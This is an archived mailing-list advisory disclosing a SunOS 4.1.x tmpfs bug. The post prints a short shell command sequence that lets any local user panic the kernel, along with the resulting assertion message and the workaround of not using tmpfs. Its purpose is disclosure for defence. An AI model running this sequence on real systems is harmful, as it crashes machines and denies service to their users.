While searching SunSolve for a completely unrelated issue, I came across two bug reports (1115820, 1111248) that describe a way for any user to panic a system running SunOS 4.1.1, 4.1.3, 4.1.3_U1, and 4.1.4. While the bugs have been reported to Sun, no patch is available. There is a simple workaround, if you dont' require tmpfs. I have never seen this reported, so it might be good to share this with a wider audience. I don't want my users using this as a DoS against our older servers. Requirements: - The system must have /tmp mounted on swap (tmpfs) - /tmp must be writable by the UID that will crash the machine. Since tmp is frequently has full permissions (drwxrwxrwt), this is fairly common How to panic the system: cd /tmp mkdir xx cd xx rmdir ../xx touch yy cd / The system will then panic with "assertion failed: tp->tn_dir == NULL, file: ../../tmpfs/tmp_tnode.c, line: 167" (from SunOS 4.1.4). The workaround: As specified in the bug reports, "do not use tmpfs." I tested this only on SunOS 4.1.4 systems, but the bug reports list other SunOS 4.1.x versions as well. TIm -- Timothy Demarest ArrayComm, Inc. demarestat_private 3141 Zanker Road http://www.arraycomm.com San Jose, CA 95134
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:01:43 PDT